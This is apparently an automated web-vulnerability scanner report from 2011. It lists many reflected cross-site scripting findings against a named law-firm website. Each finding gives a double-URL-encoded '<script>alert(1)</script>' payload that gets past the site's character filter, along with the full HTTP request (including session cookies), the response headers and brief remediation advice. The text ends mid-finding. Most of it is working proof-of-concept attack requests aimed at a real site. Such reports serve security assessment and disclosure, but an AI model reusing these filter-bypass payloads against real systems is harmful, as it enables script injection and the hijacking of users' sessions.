The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.176. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
